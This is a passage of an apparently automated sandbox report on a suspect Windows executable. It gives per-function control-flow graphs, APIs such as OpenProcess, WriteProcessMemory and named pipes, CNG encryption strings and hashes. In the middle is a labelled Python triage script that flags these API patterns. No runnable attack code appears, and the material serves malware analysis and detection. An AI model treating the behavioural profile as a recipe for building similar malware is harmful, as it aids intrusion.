                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: AddressHandleModuleProc$AllocLocal
                                              • String ID: 3DES$AES$ChainingMode$ChainingModeCBC$ChainingModeCFB$LocalAlloc$ObjectLength$kernel32
                                              • API String ID: 1838034928-1761306045
                                              • Opcode ID: 5bcc1f89c5a41f3fdbcdbe6b7af9a21048179cca6ad5a353acb6baa70339d064
                                              • Instruction ID: b94dd1e43415301367f6daee4fd66d24aabf17ff5126d7f4d46c11b2b75f86fb
                                              • Opcode Fuzzy Hash: 5bcc1f89c5a41f3fdbcdbe6b7af9a21048179cca6ad5a353acb6baa70339d064
                                              • Instruction Fuzzy Hash: 8741ED62A19B4382FB808F16F85867527A2BB89BD8F600131CA0DC7764EFBDE549C704

                                              Control-flow Graph

                                              control_flow_graph 177 7ff6097536d8-7ff60975371d call 7ff60975326c 179 7ff609753722-7ff60975372a 177->179 180 7ff609753a63-7ff609753a7c 179->180 181 7ff609753730-7ff609753751 179->181 182 7ff60975375c-7ff609753761 181->182 183 7ff609753753-7ff60975375a 181->183 185 7ff60975376c-7ff609753771 182->185 186 7ff609753763-7ff60975376a 182->186 184 7ff6097537a3-7ff6097537ad 183->184 189 7ff6097537bf-7ff6097537da 184->189 190 7ff6097537af-7ff6097537b9 184->190 187 7ff60975377c-7ff609753781 185->187 188 7ff609753773-7ff60975377a 185->188 186->184 194 7ff60975378c-7ff60975379f 187->194 195 7ff609753783-7ff60975378a 187->195 188->184 192 7ff6097537dc-7ff6097537ec call 7ff609751170 189->192 193 7ff6097537f1-7ff6097537f6 189->193 190->189 191 7ff6097537bb 190->191 191->189 192->193 193->180 197 7ff6097537fc 193->197 194->184 195->184 198 7ff609753803-7ff609753851 GetModuleHandleW GetProcAddress 197->198 200 7ff609753857-7ff60975386e call 7ff609751170 198->200 201 7ff609753a54-7ff609753a59 198->201 205 7ff609753a4a-7ff609753a4e LocalFree 200->205 206 7ff609753874-7ff609753882 200->206 201->198 203 7ff609753a5f 201->203 203->180 205->201 207 7ff609753a3a-7ff609753a44 206->207 207->205 208 7ff609753887-7ff609753889 207->208 208->205 209 7ff60975388f-7ff6097538a2 call 7ff609751170 208->209 209->205 212 7ff6097538a8-7ff609753989 call 7ff60975224c * 3 call 7ff609751170 209->212 221 7ff60975398b-7ff6097539c7 GetModuleHandleW GetProcAddress 212->221 222 7ff6097539dd-7ff6097539f6 call 7ff609753ae8 212->222 221->222 228 7ff6097539c9-7ff6097539d8 call 7ff609751170 221->228 226 7ff6097539f8 LocalFree 222->226 227 7ff6097539fe-7ff609753a09 222->227 226->227 229 7ff609753a0b LocalFree 227->229 230 7ff609753a11-7ff609753a1c 227->230 228->222 229->230 232 7ff609753a24-7ff609753a2b 230->232 233 7ff609753a1e LocalFree 230->233 234 7ff609753a2d LocalFree 232->234 235 7ff609753a33-7ff609753a37 232->235 233->232 234->235 235->207
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: AddressFreeHandleLocalModuleProc$File$Pointer$CreateMemoryProcessWrite
                                              • String ID: LocalAlloc$kernel32
                                              • API String ID: 2588141871-3502785670
                                              • Opcode ID: 80145aa57d431d5147bb43df575b077b9336c1a2266df3ced7f7cf172c5d0ce3
                                              • Instruction ID: b6c41c4d822af9e486b7f3056fc1567b12dd6c6df01ed572b340675b0fc7c30c
                                              • Opcode Fuzzy Hash: 80145aa57d431d5147bb43df575b077b9336c1a2266df3ced7f7cf172c5d0ce3
                                              • Instruction Fuzzy Hash: 5EB1FB77B09B06CAEB90CF65E4902AC33A6EB487C8F640135EA4D83768EF78E555C740

                                              Control-flow Graph

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: DescriptorHeapSecurity$AddressAllocCreateDaclFileHandleInitializeModuleNamedPipeProcProcessSleepWait
                                              • String ID: GetLastError$kernel32
                                              • API String ID: 2144717574-498319287
                                              • Opcode ID: 4ab51b74eecba5ece5bb2e860a51bc6d2ff0e4a8fc15db7d61da1898b13bac78
                                              • Instruction ID: dbae78f05a452f3702f03d4435c4eb36b227fedfa8aac8d9448a1a315c1bab00
                                              • Opcode Fuzzy Hash: 4ab51b74eecba5ece5bb2e860a51bc6d2ff0e4a8fc15db7d61da1898b13bac78
                                              • Instruction Fuzzy Hash: 3A318133A18A4283EB948F25E44433973A1FB84BE4F644334D66D877A4EFBCD8498740

                                              Control-flow Graph

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: AddressHandleModuleProc$FreeLocal$FilePointer$MemoryProcessWrite
                                              • String ID: LocalAlloc$kernel32
                                              • API String ID: 3806729184-3502785670
                                              • Opcode ID: 715e26d59b103649faca0eeeb921ea06f3607703f71d2b78899444f4b38fef8e
                                              • Instruction ID: 0713aea3f0da0776567d400045c7063f3032079e556a05100cef46a91e06ba6e
                                              • Opcode Fuzzy Hash: 715e26d59b103649faca0eeeb921ea06f3607703f71d2b78899444f4b38fef8e
                                              • Instruction Fuzzy Hash: BE412A33B15B069AEB90DF61E4402AC7376FB44B88B544535CE0D93B59EF78EA59C380

                                              Control-flow Graph

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: _amsg_exit$CommandInitializeLine__wsetargv_cinit
                                              • String ID:
                                              • API String ID: 2949660345-0
                                              • Opcode ID: 4a7d6e35ace3f62a0085c96bf3ee593ae1479313b33e2137b40653fb956c2ead
                                              • Instruction ID: f46cfaf6ff9295d62838567b60e42b7624ea98c0676d7a0dfadf1f4379df6123
                                              • Opcode Fuzzy Hash: 4a7d6e35ace3f62a0085c96bf3ee593ae1479313b33e2137b40653fb956c2ead
                                              • Instruction Fuzzy Hash: 12311E63E4C64786FAD07FA0A4552BA22A7AF403C4F744139E55DC63E7EEECB8808651
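Added example, not part of the Joe Sandbox report and not code from the analysed sample: a Python triage script that parses the per-function "Similarity" records above (API ID, String ID, Opcode ID) into structured fields and applies a few rules to them. Its input is constructed from four records copied from this page: the function that resolves BCrypt* exports through LoadLibraryW/GetProcAddress and carries the partial strings BCryenAlthmPder and BCrynerammetey next to fragments such as "gori" and "rovi"; the function whose strings are the literal CNG algorithm and property names (AES, 3DES, ChainingMode, ChainingModeCBC, ChainingModeCFB, ObjectLength); the named-pipe function that builds its own security descriptor and DACL; and the CRT startup routine as a negative case. The flag names, the candidate list of bcrypt.dll exports and the subsequence heuristic that maps the two partial strings to BCryptOpenAlgorithmProvider and BCryptGenerateSymmetricKey are this example's assumptions: the heuristic is a check an analyst can run on the strings the report shows, not a statement about how the sample assembles them.

```python
"""Triage helper for Joe Sandbox per-function records (added example).
Parses the 'Similarity' blocks, flags API/string combinations worth a
first look, and recovers which bcrypt.dll export a partial string fits."""
import re
from dataclasses import dataclass, field

# Constructed input: four records copied from this report page.
SAMPLE_REPORT = """\
Similarity
• API ID: AddressProc$HandleLibraryLoadModule
• String ID: BCryenAlthmPder$BCrynerammeteyBCryenAlthmPder$BCryptCloseAlgorithmProvider$BCryptDecrypt$BCryptDestroyKey$BCryptEncrypt$BCryptGetProperty$BCryptSetProperty$LoadLibraryW$c$der$gori$kernel32$rovi$t$thmP$y
• Opcode ID: de6fc6558afeec837b3fc645aabfb980b25bcd809969add128eeed8ffce5164f
Similarity
• API ID: AddressHandleModuleProc$AllocLocal
• String ID: 3DES$AES$ChainingMode$ChainingModeCBC$ChainingModeCFB$LocalAlloc$ObjectLength$kernel32
• Opcode ID: 5bcc1f89c5a41f3fdbcdbe6b7af9a21048179cca6ad5a353acb6baa70339d064
Similarity
• API ID: DescriptorHeapSecurity$AddressAllocCreateDaclFileHandleInitializeModuleNamedPipeProcProcessSleepWait
• String ID: GetLastError$kernel32
• Opcode ID: 4ab51b74eecba5ece5bb2e860a51bc6d2ff0e4a8fc15db7d61da1898b13bac78
Similarity
• API ID: _amsg_exit$CommandInitializeLine__wsetargv_cinit
• String ID:
• Opcode ID: 4a7d6e35ace3f62a0085c96bf3ee593ae1479313b33e2137b40653fb956c2ead
"""

FIELD_RE = re.compile(r"^\s*•\s*([^:]+):\s*(.*)$")
# An API ID is made of the CamelCase words of each API name
# (GetProcAddress -> Address, Proc); CRT names keep their underscores.
WORD_RE = re.compile(r"[A-Z][a-z]*|_+[a-z_]+")
# Literal values of the CNG constants BCRYPT_AES_ALGORITHM,
# BCRYPT_3DES_ALGORITHM, BCRYPT_CHAINING_MODE, BCRYPT_CHAIN_MODE_CBC/CFB
# and BCRYPT_OBJECT_LENGTH.
CNG_STRINGS = {"AES", "3DES", "ChainingMode", "ChainingModeCBC",
               "ChainingModeCFB", "ObjectLength"}
# Assumption: a hand-picked subset of bcrypt.dll exports to match against.
BCRYPT_EXPORTS = [
    "BCryptOpenAlgorithmProvider", "BCryptCloseAlgorithmProvider",
    "BCryptGenerateSymmetricKey", "BCryptGenRandom", "BCryptGetProperty",
    "BCryptSetProperty", "BCryptEncrypt", "BCryptDecrypt", "BCryptDestroyKey",
    "BCryptImportKey", "BCryptExportKey",
]


@dataclass
class FunctionRecord:
    api_words: set = field(default_factory=set)
    strings: list = field(default_factory=list)
    opcode_id: str = ""


def parse_records(text: str) -> list:
    """One FunctionRecord per 'Similarity' heading; '$' separates entries."""
    records = []
    for line in text.splitlines():
        if line.strip() == "Similarity":
            records.append(FunctionRecord())
            continue
        m = FIELD_RE.match(line)
        if not m or not records:
            continue
        key, value = m.group(1).strip(), m.group(2).strip()
        rec = records[-1]
        if key == "API ID":
            for group in value.split("$"):
                rec.api_words.update(WORD_RE.findall(group))
        elif key == "String ID":
            rec.strings = [s for s in value.split("$") if s]
        elif key == "Opcode ID":
            rec.opcode_id = value
    return records


def triage_flags(rec: FunctionRecord) -> list:
    """Rules over one record's API words and strings (flag names are mine)."""
    w, flags = rec.api_words, []
    # GetModuleHandle/GetProcAddress or LoadLibrary/GetProcAddress: imports
    # resolved at run time rather than through the import table.
    if {"Address", "Proc"} <= w and ({"Handle", "Module"} <= w or {"Library", "Load"} <= w):
        flags.append("dynamic-api-resolution")
    if any(s.startswith("BCrypt") for s in rec.strings) or CNG_STRINGS & set(rec.strings):
        flags.append("cng-crypto")
    if {"Memory", "Process", "Write"} <= w:  # WriteProcessMemory
        flags.append("write-process-memory")
    if {"Named", "Pipe"} <= w and {"Descriptor", "Security", "Dacl"} <= w:
        flags.append("named-pipe-custom-dacl")
    # Several 1-4 character strings beside API names: a split/stack string.
    if sum(1 for s in rec.strings if len(s) <= 4 and s not in CNG_STRINGS) >= 3:
        flags.append("split-strings")
    return flags


def recover_export(partial: str, candidates=BCRYPT_EXPORTS) -> list:
    """A partial string such as 'BCryenAlthmPder' keeps its characters in
    order, so the export it stands for is a candidate of which it is a
    proper subsequence. Every match is returned so ambiguity stays visible."""
    def is_subsequence(needle, hay):
        it = iter(hay)
        return all(ch in it for ch in needle)
    return [c for c in candidates if len(partial) < len(c) and is_subsequence(partial, c)]


def triage_report(text: str) -> list:
    """Flags per record plus recovered exports for unknown BCry* strings."""
    out = []
    for rec in parse_records(text):
        partial = [s for s in rec.strings if s.startswith("BCry") and s not in BCRYPT_EXPORTS]
        out.append({"opcode_id": rec.opcode_id[:16], "flags": triage_flags(rec),
                    "recovered": {s: recover_export(s) for s in partial}})
    return out
```

Run `triage_report(SAMPLE_REPORT)` to get, per record, the flags and the recovered names; the concatenated string BCrynerammeteyBCryenAlthmPder deliberately yields no match because it is longer than any single export, which is the kind of result worth eyeballing rather than hiding.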

                                              Control-flow Graph

                                              control_flow_graph 333 7ff60975326c-7ff6097532ce 334 7ff6097535eb-7ff6097535fe 333->334 335 7ff6097532d4-7ff6097532e7 call 7ff609752a34 333->335 335->334 337 7ff6097532ed-7ff6097532f7 335->337 338 7ff6097532f9-7ff609753320 CreateFileW 337->338 339 7ff609753325-7ff609753359 RtlInitUnicodeString call 7ff609751864 337->339 340 7ff6097533ac-7ff6097533b2 338->340 344 7ff60975335e-7ff609753360 339->344 342 7ff609753578 340->342 343 7ff6097533b8-7ff6097533bc 340->343 345 7ff60975357f-7ff609753582 342->345 343->342 346 7ff6097533c2-7ff6097533d9 call 7ff609751000 343->346 344->342 347 7ff609753366-7ff609753370 344->347 348 7ff6097535d8-7ff6097535e8 FindCloseChangeNotification 345->348 349 7ff609753584-7ff609753588 345->349 346->342 359 7ff6097533df-7ff6097533ea 346->359 351 7ff60975337e-7ff609753389 call 7ff609751920 347->351 348->334 353 7ff60975358a-7ff60975358c 349->353 354 7ff6097535c2-7ff6097535c6 LocalFree 349->354 361 7ff60975338b-7ff609753397 LocalFree 351->361 362 7ff609753372-7ff609753374 351->362 357 7ff609753599-7ff6097535a0 353->357 358 7ff60975358e-7ff609753590 353->358 360 7ff6097535cc-7ff6097535d5 LocalFree 354->360 357->360 364 7ff6097535a2-7ff6097535ac 357->364 358->354 363 7ff609753592-7ff609753595 358->363 365 7ff6097533ec-7ff609753400 call 7ff609751624 359->365 366 7ff609753463-7ff609753482 359->366 360->348 361->342 367 7ff60975339d-7ff6097533a6 OpenProcess 361->367 362->361 373 7ff609753376-7ff60975337b 362->373 363->360 369 7ff609753597 363->369 370 7ff6097535b4-7ff6097535b7 364->370 371 7ff6097535ae UnmapViewOfFile 364->371 379 7ff609753448-7ff609753461 365->379 380 7ff609753402-7ff609753429 365->380 368 7ff609753489-7ff60975348c 366->368 367->340 368->345 374 7ff609753492-7ff6097534a7 368->374 369->354 370->354 375 7ff6097535b9-7ff6097535bc CloseHandle 370->375 371->370 373->351 377 7ff6097534a9-7ff6097534b2 374->377 378 7ff6097534b4 374->378 375->354 377->378 381 7ff6097534be-7ff6097534d2 call 
7ff60975196c 377->381 378->381 379->368 382 7ff60975342b-7ff60975342f 380->382 383 7ff60975343e-7ff609753446 380->383 381->342 387 7ff6097534d8-7ff6097534de 381->387 382->345 385 7ff609753435-7ff609753438 382->385 383->368 385->345 385->383 387->342 388 7ff6097534e4-7ff609753552 call 7ff609753da8 387->388 390 7ff609753557-7ff609753559 388->390 390->342 391 7ff60975355b-7ff609753576 390->391 391->334 391->342
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: FreeLocal$CloseFile$ChangeCreateFindHandleInitNotificationOpenProcessStringUnicodeUnmapView
                                              • String ID:
                                              • API String ID: 34978191-0
                                              • Opcode ID: cc8829089956d63626426c18dc2d50d9a0f7f225df45c6989eba5b351c94c693
                                              • Instruction ID: 6bdfb8d8889e0711da4a0c4038452feec6e9a81b1bd772eb9eec7611d69c8386
                                              • Opcode Fuzzy Hash: cc8829089956d63626426c18dc2d50d9a0f7f225df45c6989eba5b351c94c693
                                              • Instruction Fuzzy Hash: 52A10673A09643CAFB958F22E84067937A2BB847D8F645139D90D87BA4DFBCE945C700

                                              Control-flow Graph

                                              control_flow_graph 394 7ff6097566bc-7ff6097566fb GetStartupInfoW call 7ff609757520 397 7ff6097566fd-7ff609756700 394->397 398 7ff609756705-7ff60975671d 394->398 399 7ff609756970-7ff60975698d 397->399 400 7ff609756764-7ff60975676a 398->400 401 7ff60975671f 398->401 403 7ff6097568a4-7ff6097568a7 400->403 404 7ff609756770-7ff609756778 400->404 402 7ff609756723-7ff60975675c 401->402 402->402 405 7ff60975675e 402->405 407 7ff6097568aa-7ff6097568b6 403->407 404->403 406 7ff60975677e-7ff609756794 404->406 405->400 410 7ff60975679a 406->410 411 7ff609756821-7ff609756826 406->411 408 7ff6097568b8-7ff6097568bd 407->408 409 7ff6097568c9-7ff6097568f2 GetStdHandle 407->409 408->409 412 7ff6097568bf-7ff6097568c4 408->412 413 7ff6097568f4-7ff6097568f7 409->413 414 7ff609756941-7ff609756946 409->414 416 7ff6097567a1-7ff6097567b1 call 7ff609757520 410->416 411->403 415 7ff609756828-7ff60975682d 411->415 417 7ff60975694e-7ff60975695c 412->417 413->414 418 7ff6097568f9-7ff609756904 GetFileType 413->418 414->417 419 7ff609756897-7ff6097568a2 415->419 420 7ff60975682f-7ff609756834 415->420 429 7ff60975681b 416->429 430 7ff6097567b3-7ff6097567ce 416->430 417->407 424 7ff609756962-7ff60975696e SetHandleCount 417->424 418->414 422 7ff609756906-7ff609756910 418->422 419->403 419->415 420->419 423 7ff609756836-7ff60975683b 420->423 426 7ff609756919-7ff60975691c 422->426 427 7ff609756912-7ff609756917 422->427 423->419 428 7ff60975683d-7ff609756842 423->428 424->399 431 7ff609756923-7ff609756935 InitializeCriticalSectionAndSpinCount 426->431 432 7ff60975691e 426->432 427->431 433 7ff609756852-7ff60975688e InitializeCriticalSectionAndSpinCount 428->433 434 7ff609756844-7ff609756850 GetFileType 428->434 429->411 435 7ff6097567d0 430->435 436 7ff609756811-7ff609756817 430->436 431->397 439 7ff60975693b-7ff60975693f 431->439 432->431 433->397 440 7ff609756894 433->440 434->419 434->433 437 7ff6097567d4-7ff609756809 435->437 436->416 438 7ff609756819 436->438 437->437 441 7ff60975680b 437->441 438->411 439->417 440->419 441->436
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: CountCriticalFileInfoInitializeSectionSleepSpinStartupType
                                              • String ID:
                                              • API String ID: 3473179607-0
                                              • Opcode ID: 23fc88ee8adbd0c7eaf4c27518cee885393d252e9a1d10b55ff3b23b75bf4fba
                                              • Instruction ID: bc44e6e9dfba0fe1f46c56ba4be2528f1d90f5abc12b51f41105634ae6852942
                                              • Opcode Fuzzy Hash: 23fc88ee8adbd0c7eaf4c27518cee885393d252e9a1d10b55ff3b23b75bf4fba
                                              • Instruction Fuzzy Hash: 0B814163A09B8286EB948F15D44432967A2FB447B8F644339CA7D823E5DF7CE455C304

                                              Control-flow Graph

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: Local$AddressAllocFreeHandleModuleProc
                                              • String ID: LocalAlloc$kernel32
                                              • API String ID: 3402345641-3502785670
                                              • Opcode ID: eb57376ed0b4afeca1e5142186e1efa77bb62efc8010bcbc3caba3e012b0defc
                                              • Instruction ID: d2e4ad0c347e9173f257a66cf1c0a83c79ff373bb9d02e773dd4922046b7527a
                                              • Opcode Fuzzy Hash: eb57376ed0b4afeca1e5142186e1efa77bb62efc8010bcbc3caba3e012b0defc
                                              • Instruction Fuzzy Hash: FE515C33B18A5685EF90CF66E8501AD23B6FB48BC9B684136DE4E93B58DF7CD8418340

                                              Control-flow Graph

                                              APIs
                                              • _lock.LIBCMT ref: 00007FF609755A0D
                                                • Part of subcall function 00007FF60975741C: _amsg_exit.LIBCMT ref: 00007FF609757446
                                              • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF609755BD1,?,?,00000000,00007FF60975744B), ref: 00007FF609755A40
                                              • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF609755BD1,?,?,00000000,00007FF60975744B), ref: 00007FF609755A5E
                                              • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF609755BD1,?,?,00000000,00007FF60975744B), ref: 00007FF609755A9E
                                              • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF609755BD1,?,?,00000000,00007FF60975744B), ref: 00007FF609755AB8
                                              • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF609755BD1,?,?,00000000,00007FF60975744B), ref: 00007FF609755AC8
                                              • ExitProcess.KERNEL32 ref: 00007FF609755B54
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: DecodePointer$ExitProcess_amsg_exit_lock
                                              • String ID:
                                              • API String ID: 3411037476-0
                                              • Opcode ID: 2ca9a3cf637af8fc47ae09c3887ccdeb15420f15214857e012c7e6f36fb62fdc
                                              • Instruction ID: 159491123e95916680a1818eb5927921327968472964221ca9e93a3f08c9c350
                                              • Opcode Fuzzy Hash: 2ca9a3cf637af8fc47ae09c3887ccdeb15420f15214857e012c7e6f36fb62fdc
                                              • Instruction Fuzzy Hash: BE416C23A1AA4385F684AF11EC8113967A6FF887D4F240135EA4EC77A5EFBCE491C700

                                              Control-flow Graph

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: DescriptorHandleHeapSecurity$AddressAdjustAllocCloseCreateDaclFileInitializeModuleNumbersPrivilegeProcProcessSleepVersion
                                              • String ID:
                                              • API String ID: 366963940-0
                                              • Opcode ID: 5f5447fcf68489846dc299bc371346d0ad4ccce6d3d7bd68e5f5ed360826dd67
                                              • Instruction ID: ce9513c9a33845d0357c402f76e2176e5804b14d37955e5d62912a382107d936
                                              • Opcode Fuzzy Hash: 5f5447fcf68489846dc299bc371346d0ad4ccce6d3d7bd68e5f5ed360826dd67
                                              • Instruction Fuzzy Hash: 81111633A09A0392EB909F11E8551B83362FF447D4FA40236D56DC67A1DFBCE549CB40
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: Heap$CreateInformationVersion
                                              • String ID:
                                              • API String ID: 3563531100-0
                                              • Opcode ID: 196e626f87aaeb48684bc97888c59a56b1a0abfcc28fc9b23060c14a5b268ca3
                                              • Instruction ID: a75e98fda5cc269f824f510d6e73bb0fe2b6a4f71ad7d14fb1a900504389ac5a
                                              • Opcode Fuzzy Hash: 196e626f87aaeb48684bc97888c59a56b1a0abfcc28fc9b23060c14a5b268ca3
                                              • Instruction Fuzzy Hash: B5E06536A1974242FBC86F10A81A7753252BF843C1FA05134D54E82754EFBCD045C600
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: File_set_error_mode$CurrentHandleModuleNameProcessWrite
                                              • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                              • API String ID: 2183313154-4022980321
                                              • Opcode ID: ee30e25ceeb64b6f7566f0a35a21b345d76023c3b733a07fe50355b554bba3a2
                                              • Instruction ID: 1155fe4861d2b457d836641930c6dfb82c488011966d81c02e97f8ea8c44357b
                                              • Opcode Fuzzy Hash: ee30e25ceeb64b6f7566f0a35a21b345d76023c3b733a07fe50355b554bba3a2
                                              • Instruction Fuzzy Hash: FC51E323B1868282FAE4DF25A4156BA2393FF85BC4FA44135EE4DC3B85DFBCE5018600
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
